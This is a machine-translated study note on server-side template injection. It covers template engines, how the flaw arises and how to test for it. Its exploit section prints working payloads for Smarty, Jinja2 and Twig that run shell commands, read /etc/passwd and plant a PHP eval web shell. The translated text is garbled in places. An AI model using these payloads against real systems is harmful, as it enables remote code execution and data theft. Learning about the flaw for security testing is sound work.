Weekly learning summary link

Preface

This article is just a simple use , For in-depth code audit, due to my temporary limited level , Can't explain too much , So don't explain , Just talk about exploits , I will make up for the audit part of the code and some exploits later
A small hurdle of this article
You can also see my learning summary article , I will add other uses to it

One 、 Inject

Definition of injection ： Injection is a manifestation of the format string vulnerability

Two 、 What is? SSTI Template Injection

SSTI （ Server side template Injection ） It is also a very good example of formatting strings , Today's development has formed a very mature MVC The pattern of , Our input passes V receive , hand C , Then from C call M Or something C To deal with , Finally return to V , This finally shows up in front of us , So here V A technology called template is widely used in . please remember , Wherever templates are used, there may be SSTI The problem of ,SSTI It doesn't belong to any language , Sandbox bypass is not , Sandbox bypassing is only due to a large security vulnerability found by the template engine , Then a protection mechanism designed by the template engine , Modules that are not defined or declared are not allowed , This applies to all template engines .

3、 ... and 、 Common template engines

1. PHP
   1. Smarty

      Smarty It's a very old kind of PHP Template engine , Very classic , It is widely used

   2. Twig

      Twig It comes from Symfony Template engine for , It is very easy to install and use . It operates a bit like Mustache and liquid.

   3. Blade

      Blade yes Laravel Provides a simple and powerful template engine .
      And other popular PHP The template engine is different ,Blade There's no limit to using native in the view PHP Code . all Blade View files will be compiled as native PHP Code and cache it , Unless it's modified , Otherwise it won't recompile , That means Blade Basically, it won't add any extra burden to your application .

2. Java
   1. JSP

      For beginners, this is used. To tell the truth, this seems a little out 了 . However, the online stock is still quite large

   2. FreeMarker

      FreeMarker It's a template engine ： It's based on the template and the data to be changed , And used to generate output text （HTML Webpage 、 E-mail 、 The configuration file 、 Source code, etc ） General tools for . It's not for end users , It is a Java Class library , It's a component that programmers can embed in their products .

   3. Velocity

      Velocity As a template engine with a long history, it can not only replace JSP As Java Web Web page template engine on server side , And it can be used as a template engine for ordinary text to enhance the text processing ability of server program .

3. Python
   1. Jinja2

      flask jinja2 Always said together , It is widely used

   2. django

      django You should use your own template engine , I'll just call him here django, We all know django Known for rapid development , Have their own easy to use ORM, Many of his things are highly coupled , You can't play with anything else django The characteristics of

   3. tornado

      tornado It also has its own set of template engine ,tornado The emphasis is on asynchronous non blocking high concurrency

Four 、SSTI How to produce

After the server receives the user's malicious input , Treat it as... Without any treatment Web Part of the application template content , The template engine is in the process of target compilation and rendering , Executed a statement inserted by the user that can destroy the template , This may lead to the disclosure of sensitive information 、 Code execution 、GetShell Other questions .

5、 ... and 、 test method

Same as conventional SQL Injection detection ,XSS The test is the same , The detection of template injection vulnerability is also to carry specific information in the passed parameters Payload And judge according to the returned content . Each template engine has its own Syntax ,Payload The construction of needs to formulate different scanning rules for various template engines , Just as SQL There are different database types in injection .

Simply speaking , It is to change the request parameters so that they can host Payload, Detect the hosted content through the content returned by page rendering Payload Whether it has been compiled and parsed , If there is analysis, it can be determined that it contains Payload Corresponding template engine injection , Otherwise, it doesn't exist SSTI.

Be careful ： Sometimes XSS When , It could be SSTI Loophole , Although template engine is used in most cases xss The filter , However, it does not rule out the occurrence of some unexpected situations , such as
Some template engines ( such as jinja2) By default, only files with specific file suffixes are rendered (html,xhtml etc. ) Conduct XSS Filter

Tools

6、 ... and 、 Attack ideas

1. Direction of attack

(1) The template itself
(2) The framework itself
(3) The language itself
(4) Application itself

2. Exploit

Here I haven't found enough ways to use , Just paste what you have

1. Smarty Template Injection ：（ I use it all when I take notes here if The sentence will not be changed ）

   {
         if phpinfo()}{
         /if}
   {
         if readfile(‘ Document Lujin ’)}{
         /if}
   {
         if show_source(‘ File path ’)}{
         /if}
   {
         if passthru(‘ Operation command ’)}{
         /if}
   {
         if system(‘ Operation command ’)}{
         /if}
   {
         system('cat /flag')}
   {
         self::getStreamVariable("file:///etc/passwd")}
   {
         Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']); ?>",self::clearConfig())}
    Conventional utilization 
   {
         $smarty.version}  # obtain smarty Version number of 
   {
         php}phpinfo();{
         /php}  # Execute corresponding php Code , stay Smarty 3.1,{php} Only in SmartyBC Available in the 
   <script language="php">phpinfo();</script>
   {
         self::getStreamVariable("file:///etc/passwd")}
    Wait, wait, wait ............
   
   

2. Jinja2:

     Python2:
   #(system Replace the function with popen('').read(), Import required os modular ) 
   {
         {
         ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}} 
   #( No need to import os modular , Call directly from other modules )
   {
         {
         ().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
   # frequently-used py2 EXP
   ().__class__.__base__.__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")
   
   

     Python3:
   {
         {
         ().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('id').read()")}}
   
   

3. Twig:

   {
         {
         _self.env.registerUndefinedFilterCallback("exec")}}{
         {
         _self.env.getFilter("id")}}
   
   

7、 ... and 、 summary

Just learn how to find loopholes at the beginning , There is no need to delve into

Big brother's article links
The article links